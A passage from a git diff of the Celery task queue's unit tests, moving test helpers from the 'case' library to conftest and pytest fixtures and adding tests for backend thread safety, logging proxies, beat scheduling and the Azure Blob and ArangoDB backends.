+ assert main_backend is not thread_backend
+
+ def test_thread_oid_is_local(self):
+        # Test that thread_oid is local to each thread.
+ main_oid = self.app.thread_oid
+ uuid.UUID(main_oid)
+ from concurrent.futures import ThreadPoolExecutor
+ with ThreadPoolExecutor(max_workers=1) as executor:
+ future = executor.submit(lambda: self.app.thread_oid)
+ thread_oid = future.result()
+ uuid.UUID(thread_oid)
+ assert main_oid != thread_oid
+
class test_defaults:
@@ -997,26 +1079,26 @@ def test_enable_disable_trace(self):
class test_pyimplementation:
def test_platform_python_implementation(self):
- with mock.platform_pyimp(lambda: 'Xython'):
+ with conftest.platform_pyimp(lambda: 'Xython'):
assert pyimplementation() == 'Xython'
def test_platform_jython(self):
- with mock.platform_pyimp():
- with mock.sys_platform('java 1.6.51'):
+ with conftest.platform_pyimp():
+ with conftest.sys_platform('java 1.6.51'):
assert 'Jython' in pyimplementation()
def test_platform_pypy(self):
- with mock.platform_pyimp():
- with mock.sys_platform('darwin'):
- with mock.pypy_version((1, 4, 3)):
+ with conftest.platform_pyimp():
+ with conftest.sys_platform('darwin'):
+ with conftest.pypy_version((1, 4, 3)):
assert 'PyPy' in pyimplementation()
- with mock.pypy_version((1, 4, 3, 'a4')):
+ with conftest.pypy_version((1, 4, 3, 'a4')):
assert 'PyPy' in pyimplementation()
def test_platform_fallback(self):
- with mock.platform_pyimp():
- with mock.sys_platform('darwin'):
- with mock.pypy_version():
+ with conftest.platform_pyimp():
+ with conftest.sys_platform('darwin'):
+ with conftest.pypy_version():
assert 'CPython' == pyimplementation()
diff --git a/t/unit/app/test_backends.py b/t/unit/app/test_backends.py
index a87f9665053..df4e47af772 100644
--- a/t/unit/app/test_backends.py
+++ b/t/unit/app/test_backends.py
@@ -1,10 +1,87 @@
+import threading
+from contextlib import contextmanager
from unittest.mock import patch
import pytest
+import celery.contrib.testing.worker as contrib_embed_worker
from celery.app import backends
from celery.backends.cache import CacheBackend
from celery.exceptions import ImproperlyConfigured
+from celery.utils.nodenames import anon_nodename
+
+
+class CachedBackendWithThreadTracking(CacheBackend):
+ test_instance_count = 0
+ test_call_stats = {}
+
+ def _track_attribute_access(self, method_name):
+ cls = type(self)
+
+ instance_no = getattr(self, '_instance_no', None)
+ if instance_no is None:
+ instance_no = self._instance_no = cls.test_instance_count
+ cls.test_instance_count += 1
+ cls.test_call_stats[instance_no] = []
+
+ cls.test_call_stats[instance_no].append({
+ 'thread_id': threading.get_ident(),
+ 'method_name': method_name
+ })
+
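+    # Record every attribute access together with the calling thread's id.
+    # Lookups of tracking internals and dunder attributes (other than
+    # ``__init__``) bypass recording to avoid infinite recursion.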
+ def __getattribute__(self, name):
+ if name == '_instance_no' or name == '_track_attribute_access':
+ return super().__getattribute__(name)
+
+ if name.startswith('__') and name != '__init__':
+ return super().__getattribute__(name)
+
+ self._track_attribute_access(name)
+ return super().__getattribute__(name)
+
+
+@contextmanager
+def embed_worker(app,
+ concurrency=1,
+ pool='threading', **kwargs):
+ """
+ Helper embedded worker for testing.
+
+    It's based on :func:`celery.contrib.testing.worker.start_worker`,
+    but doesn't modify logging settings and additionally shuts down
+    the worker pool.
+ """
+ # prepare application for worker
+ app.finalize()
+ app.set_current()
+
+ worker = contrib_embed_worker.TestWorkController(
+ app=app,
+ concurrency=concurrency,
+ hostname=anon_nodename(),
+ pool=pool,
+ # not allowed to override TestWorkController.on_consumer_ready
+ ready_callback=None,
+ without_heartbeat=kwargs.pop("without_heartbeat", True),
+ without_mingle=True,
+ without_gossip=True,
+ **kwargs
+ )
+
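+    # Run the worker in a daemon thread so a hung worker cannot block interpreter exit.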
+ t = threading.Thread(target=worker.start, daemon=True)
+ t.start()
+ worker.ensure_started()
+
+ yield worker
+
+ worker.stop()
+ t.join(10.0)
+ if t.is_alive():
+ raise RuntimeError(
+ "Worker thread failed to exit within the allocated timeout. "
+ "Consider raising `shutdown_timeout` if your tasks take longer "
+ "to execute."
+ )
class test_backends:
@@ -35,3 +112,25 @@ def test_sym_raises_ValuError(self, app):
def test_backend_can_not_be_module(self, app):
with pytest.raises(ImproperlyConfigured):
backends.by_name(pytest, app.loader)
+
+ @pytest.mark.celery(
+        result_backend=f'{CachedBackendWithThreadTracking.__module__}.'
+                       f'{CachedBackendWithThreadTracking.__qualname__}'
+ f'+memory://')
+ def test_backend_thread_safety(self):
+ @self.app.task
+ def dummy_add_task(x, y):
+ return x + y
+
+ with embed_worker(app=self.app, pool='threads'):
+ result = dummy_add_task.delay(6, 9)
+ assert result.get(timeout=10) == 15
+
+        call_stats = CachedBackendWithThreadTracking.test_call_stats
+        # check that each backend instance is only used by a single thread
+ for backend_call_stats in call_stats.values():
+ thread_ids = set()
+ for call_stat in backend_call_stats:
+ thread_ids.add(call_stat['thread_id'])
+ assert len(thread_ids) <= 1, \
+ "The same celery backend instance is used by multiple threads"
diff --git a/t/unit/app/test_beat.py b/t/unit/app/test_beat.py
index 4b8339f451b..641c7b7a0b2 100644
--- a/t/unit/app/test_beat.py
+++ b/t/unit/app/test_beat.py
@@ -127,7 +127,7 @@ class mScheduler(beat.Scheduler):
def __init__(self, *args, **kwargs):
self.sent = []
- beat.Scheduler.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
def send_task(self, name=None, args=None, kwargs=None, **options):
self.sent.append({'name': name,
@@ -196,6 +196,39 @@ def foo():
scheduler.apply_async(scheduler.Entry(task=foo.name, app=self.app, args=None, kwargs=None))
foo.apply_async.assert_called()
+ def test_apply_async_with_null_args_set_to_none(self):
+
+ @self.app.task(shared=False)
+ def foo():
+ pass
+ foo.apply_async = Mock(name='foo.apply_async')
+
+ scheduler = mScheduler(app=self.app)
+ entry = scheduler.Entry(task=foo.name, app=self.app, args=None,
+ kwargs=None)
+ entry.args = None
+ entry.kwargs = None
+
+ scheduler.apply_async(entry, advance=False)
+ foo.apply_async.assert_called()
+
+ def test_apply_async_without_null_args(self):
+
+ @self.app.task(shared=False)
+ def foo(moo: int):
+ return moo
+ foo.apply_async = Mock(name='foo.apply_async')
+
+ scheduler = mScheduler(app=self.app)
+ entry = scheduler.Entry(task=foo.name, app=self.app, args=None,
+ kwargs=None)
+ entry.args = (101,)
+ entry.kwargs = None
+
+ scheduler.apply_async(entry, advance=False)
+ foo.apply_async.assert_called()
+ assert foo.apply_async.call_args[0][0] == [101]
+
def test_should_sync(self):
@self.app.task(shared=False)
@@ -566,7 +599,7 @@ class MockPersistentScheduler(beat.PersistentScheduler):
def __init__(self, *args, **kwargs):
self.sent = []
- beat.PersistentScheduler.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
def send_task(self, task=None, args=None, kwargs=None, **options):
self.sent.append({'task': task,
@@ -706,12 +739,12 @@ def test_start(self):
s.sync()
assert sh.closed
assert sh.synced
- assert s._is_stopped.isSet()
+ assert s._is_stopped.is_set()
s.sync()
s.stop(wait=False)
- assert s._is_shutdown.isSet()
+ assert s._is_shutdown.is_set()
s.stop(wait=True)
- assert s._is_shutdown.isSet()
+ assert s._is_shutdown.is_set()
p = s.scheduler._store
s.scheduler._store = None
@@ -734,13 +767,13 @@ def test_start_tick_raises_exit_error(self):
s, sh = self.get_service()
s.scheduler.tick_raises_exit = True
s.start()
- assert s._is_shutdown.isSet()
+ assert s._is_shutdown.is_set()
def test_start_manages_one_tick_before_shutdown(self):
s, sh = self.get_service()
s.scheduler.shutdown_service = s
s.start()
- assert s._is_shutdown.isSet()
+ assert s._is_shutdown.is_set()
class test_EmbeddedService:
diff --git a/t/unit/app/test_builtins.py b/t/unit/app/test_builtins.py
index b1d28690876..dcbec4b201b 100644
--- a/t/unit/app/test_builtins.py
+++ b/t/unit/app/test_builtins.py
@@ -1,10 +1,10 @@
from unittest.mock import Mock, patch
import pytest
-from case import ContextMock
from celery import chord, group
from celery.app import builtins
+from celery.contrib.testing.mocks import ContextMock
from celery.utils.functional import pass1
@@ -98,7 +98,7 @@ def setup(self):
)
self.app.conf.task_always_eager = True
self.task = builtins.add_group_task(self.app)
- BuiltinsCase.setup(self)
+ super().setup()
def test_apply_async_eager(self):
self.task.apply = Mock(name='apply')
@@ -133,7 +133,7 @@ def test_task__disable_add_to_parent(self, current_worker_task):
class test_chain(BuiltinsCase):
def setup(self):
- BuiltinsCase.setup(self)
+ super().setup()
self.task = builtins.add_chain_task(self.app)
def test_not_implemented(self):
@@ -145,7 +145,7 @@ class test_chord(BuiltinsCase):
def setup(self):
self.task = builtins.add_chord_task(self.app)
- BuiltinsCase.setup(self)
+ super().setup()
def test_apply_async(self):
x = chord([self.add.s(i, i) for i in range(10)], body=self.xsum.s())
diff --git a/t/unit/app/test_control.py b/t/unit/app/test_control.py
index 5757af757b0..37fa3e8b2ae 100644
--- a/t/unit/app/test_control.py
+++ b/t/unit/app/test_control.py
@@ -95,7 +95,11 @@ def assert_broadcast_called(self, command,
def test_active(self):
self.inspect.active()
- self.assert_broadcast_called('active')
+ self.assert_broadcast_called('active', safe=None)
+
+ def test_active_safe(self):
+ self.inspect.active(safe=True)
+ self.assert_broadcast_called('active', safe=True)
def test_clock(self):
self.inspect.clock()
@@ -241,6 +245,12 @@ def assert_control_called_with_args(self, name, destination=None,
self.app.control.broadcast.assert_called_with(
name, destination=destination, arguments=args, **_options or {})
+ def test_serializer(self):
+ self.app.conf['task_serializer'] = 'test'
+ self.app.conf['accept_content'] = ['test']
+ assert control.Control(self.app).mailbox.serializer == 'test'
+ assert control.Control(self.app).mailbox.accept == ['test']
+
def test_purge(self):
self.app.amqp.TaskConsumer = Mock(name='TaskConsumer')
self.app.control.purge()
diff --git a/t/unit/app/test_exceptions.py b/t/unit/app/test_exceptions.py
index 3b42a0bed55..b881be4c028 100644
--- a/t/unit/app/test_exceptions.py
+++ b/t/unit/app/test_exceptions.py
@@ -12,7 +12,10 @@ def test_when_datetime(self):
def test_pickleable(self):
x = Retry('foo', KeyError(), when=datetime.utcnow())
- assert pickle.loads(pickle.dumps(x))
+ y = pickle.loads(pickle.dumps(x))
+ assert x.message == y.message
+ assert repr(x.exc) == repr(y.exc)
+ assert x.when == y.when
class test_Reject:
diff --git a/t/unit/app/test_loaders.py b/t/unit/app/test_loaders.py
index 97becf0e397..09c8a6fe775 100644
--- a/t/unit/app/test_loaders.py
+++ b/t/unit/app/test_loaders.py
@@ -4,7 +4,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
from celery import loaders
from celery.exceptions import NotConfigured
@@ -69,9 +68,12 @@ def test_init_worker_process(self):
m.assert_called_with()
def test_config_from_object_module(self):
- self.loader.import_from_cwd = Mock()
+ self.loader.import_from_cwd = Mock(return_value={
+ "override_backends": {"db": "custom.backend.module"},
+ })
self.loader.config_from_object('module_name')
self.loader.import_from_cwd.assert_called_with('module_name')
+ assert self.loader.override_backends == {"db": "custom.backend.module"}
def test_conf_property(self):
assert self.loader.conf['foo'] == 'bar'
@@ -117,8 +119,8 @@ def test_read_configuration_not_a_package(self, find_module):
l.read_configuration(fail_silently=False)
@patch('celery.loaders.base.find_module')
- @mock.environ('CELERY_CONFIG_MODULE', 'celeryconfig.py')
- def test_read_configuration_py_in_name(self, find_module):
+ @pytest.mark.patched_environ('CELERY_CONFIG_MODULE', 'celeryconfig.py')
+ def test_read_configuration_py_in_name(self, find_module, environ):
find_module.side_effect = NotAPackage()
l = default.Loader(app=self.app)
with pytest.raises(NotAPackage):
diff --git a/t/unit/app/test_log.py b/t/unit/app/test_log.py
index 453c3f26702..32440862bd2 100644
--- a/t/unit/app/test_log.py
+++ b/t/unit/app/test_log.py
@@ -6,8 +6,6 @@
from unittest.mock import Mock, patch
import pytest
-from case import mock
-from case.utils import get_logger_handlers
from celery import signals, uuid
from celery.app.log import TaskFormatter
@@ -15,6 +13,7 @@
get_task_logger, in_sighandler)
from celery.utils.log import logger as base_logger
from celery.utils.log import logger_isa, task_logger
+from t.unit import conftest
class test_TaskFormatter:
@@ -103,8 +102,6 @@ def test_formatException_bytes(self, safe_str, fe):
raise Exception()
except Exception:
assert x.formatException(sys.exc_info())
- if sys.version_info[0] == 2:
- safe_str.assert_called()
@patch('logging.Formatter.format')
def test_format_object(self, _format):
@@ -167,12 +164,10 @@ def test_get_logger_root(self):
logger = get_logger(base_logger.name)
assert logger.parent is logging.root
- @mock.restore_logging()
- def test_setup_logging_subsystem_misc(self):
+ def test_setup_logging_subsystem_misc(self, restore_logging):
self.app.log.setup_logging_subsystem(loglevel=None)
- @mock.restore_logging()
- def test_setup_logging_subsystem_misc2(self):
+ def test_setup_logging_subsystem_misc2(self, restore_logging):
self.app.conf.worker_hijack_root_logger = True
self.app.log.setup_logging_subsystem()
@@ -185,18 +180,15 @@ def test_configure_logger(self):
self.app.log._configure_logger(None, sys.stderr, None, '', False)
logger.handlers[:] = []
- @mock.restore_logging()
- def test_setup_logging_subsystem_colorize(self):
+ def test_setup_logging_subsystem_colorize(self, restore_logging):
self.app.log.setup_logging_subsystem(colorize=None)
self.app.log.setup_logging_subsystem(colorize=True)
- @mock.restore_logging()
- def test_setup_logging_subsystem_no_mputil(self):
- with mock.mask_modules('billiard.util'):
- self.app.log.setup_logging_subsystem()
+ @pytest.mark.masked_modules('billiard.util')
+ def test_setup_logging_subsystem_no_mputil(self, restore_logging, mask_modules):
+ self.app.log.setup_logging_subsystem()
- @mock.restore_logging()
- def test_setup_logger(self):
+ def test_setup_logger(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False, colorize=True)
logger.handlers = []
@@ -204,16 +196,14 @@ def test_setup_logger(self):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False, colorize=None)
# setup_logger logs to stderr without logfile argument.
- assert (get_logger_handlers(logger)[0].stream is
+ assert (conftest.get_logger_handlers(logger)[0].stream is
sys.__stderr__)
- @mock.restore_logging()
- def test_setup_logger_no_handlers_stream(self):
+ def test_setup_logger_no_handlers_stream(self, restore_logging):
l = self.get_logger()
l.handlers = []
- with mock.stdouts() as outs:
- stdout, stderr = outs
+ with conftest.stdouts() as (stdout, stderr):
l = self.setup_logger(logfile=sys.stderr,
loglevel=logging.INFO, root=False)
l.info('The quick brown fox...')
@@ -222,10 +212,8 @@ def test_setup_logger_no_handlers_stream(self):
@patch('os.fstat')
def test_setup_logger_no_handlers_file(self, *args):
tempfile = mktemp(suffix='unittest', prefix='celery')
- _open = ('builtins.open' if sys.version_info[0] == 3
- else '__builtin__.open')
- with patch(_open) as osopen:
- with mock.restore_logging():
+ with patch('builtins.open') as osopen:
+ with conftest.restore_logging_context_manager():
files = defaultdict(StringIO)
def open_file(filename, *args, **kwargs):
@@ -240,16 +228,15 @@ def open_file(filename, *args, **kwargs):
l = self.setup_logger(
logfile=tempfile, loglevel=logging.INFO, root=False,
)
- assert isinstance(get_logger_handlers(l)[0],
+ assert isinstance(conftest.get_logger_handlers(l)[0],
logging.FileHandler)
assert tempfile in files
- @mock.restore_logging()
- def test_redirect_stdouts(self):
+ def test_redirect_stdouts(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
try:
- with mock.wrap_logger(logger) as sio:
+ with conftest.wrap_logger(logger) as sio:
self.app.log.redirect_stdouts_to_logger(
logger, loglevel=logging.ERROR,
)
@@ -261,19 +248,21 @@ def test_redirect_stdouts(self):
finally:
sys.stdout, sys.stderr = sys.__stdout__, sys.__stderr__
- @mock.restore_logging()
- def test_logging_proxy(self):
+ def test_logging_proxy(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
- with mock.wrap_logger(logger) as sio:
+ with conftest.wrap_logger(logger) as sio:
p = LoggingProxy(logger, loglevel=logging.ERROR)
p.close()
p.write('foo')
assert 'foo' not in sio.getvalue()
p.closed = False
- p.write('foo')
- assert 'foo' in sio.getvalue()
+ p.write('\n')
+ assert sio.getvalue() == ''
+ write_res = p.write('foo ')
+ assert sio.getvalue() == 'foo \n'
+ assert write_res == 4
lines = ['baz', 'xuzzy']
p.writelines(lines)
for line in lines:
@@ -282,19 +271,42 @@ def test_logging_proxy(self):
p.close()
assert not p.isatty()
- with mock.stdouts() as (stdout, stderr):
+ with conftest.stdouts() as (stdout, stderr):
with in_sighandler():
p.write('foo')
assert stderr.getvalue()
- @mock.restore_logging()
- def test_logging_proxy_recurse_protection(self):
+ def test_logging_proxy_bytes(self, restore_logging):
+ logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
+ root=False)
+
+ with conftest.wrap_logger(logger) as sio:
+ p = LoggingProxy(logger, loglevel=logging.ERROR)
+ p.close()
+ p.write(b'foo')
+ assert 'foo' not in str(sio.getvalue())
+ p.closed = False
+ p.write(b'\n')
+ assert str(sio.getvalue()) == ''
+ write_res = p.write(b'foo ')
+ assert str(sio.getvalue()) == 'foo \n'
+ assert write_res == 4
+ p.flush()
+ p.close()
+ assert not p.isatty()
+
+ with conftest.stdouts() as (stdout, stderr):
+ with in_sighandler():
+ p.write(b'foo')
+ assert stderr.getvalue()
+
+ def test_logging_proxy_recurse_protection(self, restore_logging):
logger = self.setup_logger(loglevel=logging.ERROR, logfile=None,
root=False)
p = LoggingProxy(logger, loglevel=logging.ERROR)
p._thread.recurse_protection = True
try:
- assert p.write('FOOFO') is None
+ assert p.write('FOOFO') == 0
finally:
p._thread.recurse_protection = False
@@ -339,7 +351,7 @@ class MockLogger(logging.Logger):
def __init__(self, *args, **kwargs):
self._records = []
- logging.Logger.__init__(self, *args, **kwargs)
+ super().__init__(*args, **kwargs)
def handle(self, record):
self._records.append(record)
diff --git a/t/unit/app/test_routes.py b/t/unit/app/test_routes.py
index 309335e1923..fbb2803b4d1 100644
--- a/t/unit/app/test_routes.py
+++ b/t/unit/app/test_routes.py
@@ -16,6 +16,7 @@ def Router(app, *args, **kwargs):
def E(app, queues):
def expand(answer):
return Router(app, [], queues).expand_destination(answer)
+
return expand
@@ -46,6 +47,7 @@ def setup(self):
@self.app.task(shared=False)
def mytask(*args, **kwargs):
pass
+
self.mytask = mytask
def assert_routes_to_queue(self, queue, router, name,
@@ -56,7 +58,8 @@ def assert_routes_to_queue(self, queue, router, name,
kwargs = {}
if args is None:
args = []
- assert router.route(options, name, args, kwargs)['queue'].name == queue
+ assert router.route(options, name, args, kwargs)[
+ 'queue'].name == queue
def assert_routes_to_default_queue(self, router, name, *args, **kwargs):
self.assert_routes_to_queue(
@@ -85,10 +88,13 @@ def test_route_for_task__glob(self):
from re import compile
route = routes.MapRoute([
+ ('proj.tasks.bar*', {'queue': 'routeC'}),
('proj.tasks.*', 'routeA'),
('demoapp.tasks.bar.*', {'exchange': 'routeB'}),
(compile(r'(video|image)\.tasks\..*'), {'queue': 'media'}),
])
+ assert route('proj.tasks.bar') == {'queue': 'routeC'}
+ assert route('proj.tasks.bar.baz') == {'queue': 'routeC'}
assert route('proj.tasks.foo') == {'queue': 'routeA'}
assert route('demoapp.tasks.bar.moo') == {'exchange': 'routeB'}
assert route('video.tasks.foo') == {'queue': 'media'}
@@ -97,7 +103,7 @@ def test_route_for_task__glob(self):
def test_expand_route_not_found(self):
expand = E(self.app, self.app.amqp.Queues(
- self.app.conf.task_queues, False))
+ self.app.conf.task_queues, False))
route = routes.MapRoute({'a': {'queue': 'x'}})
with pytest.raises(QueueNotFound):
expand(route('a'))
diff --git a/t/unit/app/test_schedules.py b/t/unit/app/test_schedules.py
index 881791a10ed..a8bed808a30 100644
--- a/t/unit/app/test_schedules.py
+++ b/t/unit/app/test_schedules.py
@@ -2,16 +2,16 @@
from contextlib import contextmanager
from datetime import datetime, timedelta
from pickle import dumps, loads
+from unittest import TestCase
from unittest.mock import Mock
import pytest
import pytz
-from case import Case
from celery.schedules import (ParseException, crontab, crontab_parser,
schedule, solar)
-assertions = Case('__init__')
+assertions = TestCase('__init__')
@contextmanager
diff --git a/t/unit/apps/test_multi.py b/t/unit/apps/test_multi.py
index f7de1d5e27f..4c3fd9bfc1f 100644
--- a/t/unit/apps/test_multi.py
+++ b/t/unit/apps/test_multi.py
@@ -69,7 +69,7 @@ def test_parse(self, gethostname, mkdirs_mock):
'--', '.disable_rate_limits=1',
])
p.parse()
- it = multi_args(p, cmd='COMMAND', append='*AP*',
+ it = multi_args(p, cmd='celery multi', append='*AP*',
prefix='*P*', suffix='*S*')
nodes = list(it)
@@ -85,32 +85,32 @@ def assert_line_in(name, args):
assert_line_in(
'*P*jerry@*S*',
- ['COMMAND', '-n *P*jerry@*S*', '-Q bar',
+ ['celery multi', '-n *P*jerry@*S*', '-Q bar',
'-c 5', '--flag', '--logfile=/var/log/celery/foo',
'-- .disable_rate_limits=1', '*AP*'],
)
assert_line_in(
'*P*elaine@*S*',
- ['COMMAND', '-n *P*elaine@*S*', '-Q bar',
+ ['celery multi', '-n *P*elaine@*S*', '-Q bar',
'-c 5', '--flag', '--logfile=/var/log/celery/foo',
'-- .disable_rate_limits=1', '*AP*'],
)
assert_line_in(
'*P*kramer@*S*',
- ['COMMAND', '--loglevel=DEBUG', '-n *P*kramer@*S*',
+ ['celery multi', '--loglevel=DEBUG', '-n *P*kramer@*S*',
'-Q bar', '--flag', '--logfile=/var/log/celery/foo',
'-- .disable_rate_limits=1', '*AP*'],
)
expand = nodes[0].expander
assert expand('%h') == '*P*jerry@*S*'
assert expand('%n') == '*P*jerry'
- nodes2 = list(multi_args(p, cmd='COMMAND', append='',
+ nodes2 = list(multi_args(p, cmd='celery multi', append='',
prefix='*P*', suffix='*S*'))
assert nodes2[0].argv[-1] == '-- .disable_rate_limits=1'
p2 = NamespacedOptionParser(['10', '-c:1', '5'])
p2.parse()
- nodes3 = list(multi_args(p2, cmd='COMMAND'))
+ nodes3 = list(multi_args(p2, cmd='celery multi'))
def _args(name, *args):
return args + (
@@ -123,40 +123,40 @@ def _args(name, *args):
assert len(nodes3) == 10
assert nodes3[0].name == 'celery1@example.com'
assert nodes3[0].argv == (
- 'COMMAND', '-c 5', '-n celery1@example.com') + _args('celery1')
+ 'celery multi', '-c 5', '-n celery1@example.com') + _args('celery1')
for i, worker in enumerate(nodes3[1:]):
assert worker.name == 'celery%s@example.com' % (i + 2)
node_i = f'celery{i + 2}'
assert worker.argv == (
- 'COMMAND',
+ 'celery multi',
f'-n {node_i}@example.com') + _args(node_i)
- nodes4 = list(multi_args(p2, cmd='COMMAND', suffix='""'))
+ nodes4 = list(multi_args(p2, cmd='celery multi', suffix='""'))
assert len(nodes4) == 10
assert nodes4[0].name == 'celery1@'
assert nodes4[0].argv == (
- 'COMMAND', '-c 5', '-n celery1@') + _args('celery1')
+ 'celery multi', '-c 5', '-n celery1@') + _args('celery1')
p3 = NamespacedOptionParser(['foo@', '-c:foo', '5'])
p3.parse()
- nodes5 = list(multi_args(p3, cmd='COMMAND', suffix='""'))
+ nodes5 = list(multi_args(p3, cmd='celery multi', suffix='""'))
assert nodes5[0].name == 'foo@'
assert nodes5[0].argv == (
- 'COMMAND', '-c 5', '-n foo@') + _args('foo')
+ 'celery multi', '-c 5', '-n foo@') + _args('foo')
p4 = NamespacedOptionParser(['foo', '-Q:1', 'test'])
p4.parse()
- nodes6 = list(multi_args(p4, cmd='COMMAND', suffix='""'))
+ nodes6 = list(multi_args(p4, cmd='celery multi', suffix='""'))
assert nodes6[0].name == 'foo@'
assert nodes6[0].argv == (
- 'COMMAND', '-Q test', '-n foo@') + _args('foo')
+ 'celery multi', '-Q test', '-n foo@') + _args('foo')
p5 = NamespacedOptionParser(['foo@bar', '-Q:1', 'test'])
p5.parse()
- nodes7 = list(multi_args(p5, cmd='COMMAND', suffix='""'))
+ nodes7 = list(multi_args(p5, cmd='celery multi', suffix='""'))
assert nodes7[0].name == 'foo@bar'
assert nodes7[0].argv == (
- 'COMMAND', '-Q test', '-n foo@bar') + _args('foo')
+ 'celery multi', '-Q test', '-n foo@bar') + _args('foo')
p6 = NamespacedOptionParser(['foo@bar', '-Q:0', 'test'])
p6.parse()
@@ -192,8 +192,7 @@ def test_from_kwargs(self):
max_tasks_per_child=30, A='foo', Q='q1,q2', O='fair',
)
assert sorted(n.argv) == sorted([
- '-m celery worker --detach',
- '-A foo',
+ '-m celery -A foo worker --detach',
f'--executable={n.executable}',
'-O fair',
'-n foo@bar.com',
diff --git a/t/unit/backends/test_arangodb.py b/t/unit/backends/test_arangodb.py
index 82dd49d1514..4486f0b52c0 100644
--- a/t/unit/backends/test_arangodb.py
+++ b/t/unit/backends/test_arangodb.py
@@ -12,7 +12,7 @@
try:
import pyArango
except ImportError:
- pyArango = None # noqa
+ pyArango = None
pytest.importorskip('pyArango')
@@ -71,7 +71,8 @@ def test_config_params(self):
'password': 'mysecret',
'database': 'celery_database',
'collection': 'celery_collection',
- 'http_protocol': 'https'
+ 'http_protocol': 'https',
+ 'verify': True
}
x = ArangoDbBackend(app=self.app)
assert x.host == 'test.arangodb.com'
@@ -82,6 +83,7 @@ def test_config_params(self):
assert x.collection == 'celery_collection'
assert x.http_protocol == 'https'
assert x.arangodb_url == 'https://test.arangodb.com:8529'
+ assert x.verify is True
def test_backend_by_url(
self, url="arangodb://username:password@host:port/database/collection"
@@ -106,6 +108,7 @@ def test_backend_params_by_url(self):
assert x.collection == 'celery_collection'
assert x.http_protocol == 'http'
assert x.arangodb_url == 'http://test.arangodb.com:8529'
+ assert x.verify is False
def test_backend_cleanup(self):
now = datetime.datetime.utcnow()
diff --git a/t/unit/backends/test_asynchronous.py b/t/unit/backends/test_asynchronous.py
index 75ba90baa97..479fd855838 100644
--- a/t/unit/backends/test_asynchronous.py
+++ b/t/unit/backends/test_asynchronous.py
@@ -1,5 +1,6 @@
import os
import socket
+import sys
import threading
import time
from unittest.mock import Mock, patch
@@ -12,6 +13,7 @@
from celery.utils import cached_property
pytest.importorskip('gevent')
+pytest.importorskip('eventlet')
@pytest.fixture(autouse=True)
@@ -140,6 +142,10 @@ def test_drain_timeout(self):
assert on_interval.call_count < 20, 'Should have limited number of calls to on_interval'
+@pytest.mark.skipif(
+ sys.platform == "win32",
+ reason="hangs forever intermittently on windows"
+)
class test_EventletDrainer(DrainerTests):
@pytest.fixture(autouse=True)
def setup_drainer(self):
@@ -152,7 +158,11 @@ def sleep(self):
def result_consumer_drain_events(self, timeout=None):
import eventlet
- eventlet.sleep(0)
+
+        # `drain_events` of asynchronous backends with pubsub has to sleep
+        # while waiting for events for no longer than the `interval` timeout,
+        # but events may arrive sooner
+ eventlet.sleep(timeout/10)
def schedule_thread(self, thread):
import eventlet
@@ -198,7 +208,11 @@ def sleep(self):
def result_consumer_drain_events(self, timeout=None):
import gevent
- gevent.sleep(0)
+
+        # `drain_events` of asynchronous backends with pubsub has to sleep
+        # while waiting for events for no longer than the `interval` timeout,
+        # but events may arrive sooner
+ gevent.sleep(timeout/10)
def schedule_thread(self, thread):
import gevent
diff --git a/t/unit/backends/test_azureblockblob.py b/t/unit/backends/test_azureblockblob.py
index 969993290d4..5329140627f 100644
--- a/t/unit/backends/test_azureblockblob.py
+++ b/t/unit/backends/test_azureblockblob.py
@@ -10,6 +10,7 @@
MODULE_TO_MOCK = "celery.backends.azureblockblob"
pytest.importorskip('azure.storage.blob')
+pytest.importorskip('azure.core.exceptions')
class test_AzureBlockBlobBackend:
@@ -25,6 +26,10 @@ def setup(self):
app=self.app,
url=self.url)
+ @pytest.fixture(params=['', 'my_folder/'])
+ def base_path(self, request):
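+        # run every test both without and with a folder prefix in the blob path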
+ return request.param
+
def test_missing_third_party_sdk(self):
azurestorage = azureblockblob.azurestorage
try:
@@ -41,55 +46,149 @@ def test_bad_connection_url(self):
with pytest.raises(ImproperlyConfigured):
AzureBlockBlobBackend._parse_url("")
- @patch(MODULE_TO_MOCK + ".BlockBlobService")
+ @patch(MODULE_TO_MOCK + ".BlobServiceClient")
def test_create_client(self, mock_blob_service_factory):
- mock_blob_service_instance = Mock()
- mock_blob_service_factory.return_value = mock_blob_service_instance
+ mock_blob_service_client_instance = Mock()
+ mock_blob_service_factory.from_connection_string.return_value = mock_blob_service_client_instance
backend = AzureBlockBlobBackend(app=self.app, url=self.url)
# ensure container gets created on client access...
- assert mock_blob_service_instance.create_container.call_count == 0
- assert backend._client is not None
- assert mock_blob_service_instance.create_container.call_count == 1
+ assert mock_blob_service_client_instance.create_container.call_count == 0
+ assert backend._blob_service_client is not None
+ assert mock_blob_service_client_instance.create_container.call_count == 1
# ...but only once per backend instance
- assert backend._client is not None
- assert mock_blob_service_instance.create_container.call_count == 1
-
- @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._client")
- def test_get(self, mock_client):
+ assert backend._blob_service_client is not None
+ assert mock_blob_service_client_instance.create_container.call_count == 1
+
+ @patch(MODULE_TO_MOCK + ".BlobServiceClient")
+ def test_configure_client(self, mock_blob_service_factory):
+
+ connection_timeout = 3
+ read_timeout = 11
+ self.app.conf.update(
+ {
+ 'azureblockblob_connection_timeout': connection_timeout,
+ 'azureblockblob_read_timeout': read_timeout,
+ }
+ )
+
+ mock_blob_service_client_instance = Mock()
+ mock_blob_service_factory.from_connection_string.return_value = (
+ mock_blob_service_client_instance
+ )
+
+ base_url = "azureblockblob://"
+ connection_string = "connection_string"
+ backend = AzureBlockBlobBackend(
+ app=self.app, url=f'{base_url}{connection_string}'
+ )
+
+ client = backend._blob_service_client
+ assert client is mock_blob_service_client_instance
+
+ (
+ mock_blob_service_factory
+ .from_connection_string
+ .assert_called_once_with(
+ connection_string,
+ connection_timeout=connection_timeout,
+ read_timeout=read_timeout
+ )
+ )
+
+ @patch(MODULE_TO_MOCK + ".AzureBlockBlobBackend._blob_service_client")
+ def test_get(self, mock_client, base_path):
+ self.backend.base_path = base_path
self.backend.get(b"mykey")
- mock_client.get_blob_to_text.assert_called_once_with(
- "celery", "mykey")
+ mock_client.get_blob_client \
